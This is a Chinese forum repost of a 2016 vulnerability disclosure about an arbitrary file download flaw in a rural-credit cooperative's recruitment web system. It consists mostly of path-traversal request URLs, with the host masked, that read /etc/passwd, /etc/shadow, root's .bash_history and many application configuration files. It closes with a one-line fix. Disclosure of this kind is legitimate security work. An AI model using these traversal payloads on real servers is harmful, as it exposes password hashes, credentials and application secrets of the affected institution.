HanDs
管理员

[7月漏洞公开] 安徽农金某系统存在任意文件下载漏洞 





学习中请遵循国家相关法律法规,黑客不作恶。没有网络安全就没有国家安全

本站需要登陆后才能查看

任意文件下载

详细说明:

安徽农金即安徽省农村合作金融机构,包括农村商业银行,农村合作银行和农村信用合作联社

其实也就是这些

QQ截图20160527174014.png





**.**.**.**:9080/recruit/

QQ截图20160527165951.png





code 区域
**.**.**.**:9080/recruit/biz09/T090101.shtml?fileName=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&action=downLoad



QQ截图20160527170155.png

漏洞证明:

**.**.**.**:9080/recruit/biz09/T090101.shtml?fileName=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fhosts&action=downLoad

QQ截图20160527170216.png





**.**.**.**:9080/recruit/biz09/T090101.shtml?fileName=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow&action=downLoad

QQ截图20160527170253.png





**.**.**.**:9080/recruit/biz09/T090101.shtml?action=downLoad&fileName=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Froot%2F.bash_history

QQ截图20160527170450.png





通过对.bash_history的分析,发现内容很丰富

code 区域
**.**.**.**:9080/recruit/biz09/T090101.shtml?action=downLoad&fileName=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F../opt/IBM/WebSphere/AppServer/profiles/AppSrv01/installedApps/zpxtappCell01/recs_war.ear/recs.war/WEB-INF/web.xml

**.**.**.**:9080/recruit/biz09/T090101.shtml?action=downLoad&fileName=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F../opt/IBM/WebSphere/AppServer/profiles/AppSrv01/installedApps/zpxtappCell01/recs_war.ear/recs.war/WEB-INF/report/reportConfig.xml

**.**.**.**:9080/recruit/biz09/T090101.shtml?action=downLoad&fileName=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F../opt/IBM/WebSphere/AppServer/profiles/AppSrv01/installedApps/zpxtappCell01/recs_war.ear/recs.war/WEB-INF/struts-config.xml

**.**.**.**:9080/recruit/biz09/T090101.shtml?action=downLoad&fileName=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F../opt/IBM/WebSphere/AppServer/profiles/AppSrv01/installedApps/zpxtappCell01/recs_war.ear/recs.war/WEB-INF/struts-cfg/struts-system.xml

**.**.**.**:9080/recruit/biz09/T090101.shtml?action=downLoad&fileName=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F../opt/IBM/WebSphere/AppServer/profiles/AppSrv01/installedApps/zpxtappCell01/recs_war.ear/recs.war/WEB-INF/struts-cfg/struts-biz09.xml


**.**.**.**:9080/recruit/biz09/T090101.shtml?action=downLoad&fileName=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F../opt/IBM/WebSphere/AppServer/profiles/AppSrv01/installedApps/zpxtappCell01/recs_war.ear/recs.war/WEB-INF/struts-cfg/struts-index.xml

**.**.**.**:9080/recruit/biz09/T090101.shtml?action=downLoad&fileName=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F../opt/IBM/WebSphere/AppServer/profiles/AppSrv01/installedApps/zpxtappCell01/recs_war.ear/recs.war/WEB-INF/struts-cfg/struts-recruit.xml

**.**.**.**:9080/recruit/biz09/T090101.shtml?action=downLoad&fileName=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F../opt/IBM/WebSphere/AppServer/profiles/AppSrv01/installedApps/zpxtappCell01/recs_war.ear/recs.war/system/logAcc.shtml

**.**.**.**:9080/recruit/biz09/T090101.shtml?action=downLoad&fileName=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F../opt/IBM/WebSphere/AppServer/profiles/AppSrv01/installedApps/zpxtappCell01/recs_war.ear/recs.war/WEB-INF/classes/sql-map-config.xml

**.**.**.**:9080/recruit/biz09/T090101.shtml?action=downLoad&fileName=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F../opt/IBM/WebSphere/AppServer/profiles/AppSrv01/installedApps/zpxtappCell01/recs_war.ear/recs.war/WEB-INF/classes/service.properties
**.**.**.**:9080/recruit/biz09/T090101.shtml?action=downLoad&fileName=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F../opt/IBM/WebSphere/AppServer/profiles/AppSrv01/installedApps/zpxtappCell01/recs_war.ear/recs.war/WEB-INF/classes/spring/applicationContext.xml

**.**.**.**:9080/recruit/biz09/T090101.shtml?action=downLoad&fileName=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F../opt/IBM/WebSphere/AppServer/profiles/AppSrv01/installedApps/zpxtappCell01/zhaopin_war.ear/zhaopin.war/WEB-INF/classes/conf.properties



系统内一共有2个站

一个是zhaopin.war;另一个是recs.war



以及其它一些泄漏的路径待探索

QQ截图20160527213911.png





通过对泄漏的一些web路径我们还可以尝试越权操作

QQ截图20160527213952.png



QQ截图20160527214218.png



QQ截图20160527214242.png



QQ截图20160527214309.png

修复方案:

过滤../


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
安徽 农金某 系统 存在 任意 文件下载 漏洞
#1楼
发帖时间:2016-7-15   |   查看数:0   |   回复数:0
游客组
快速回复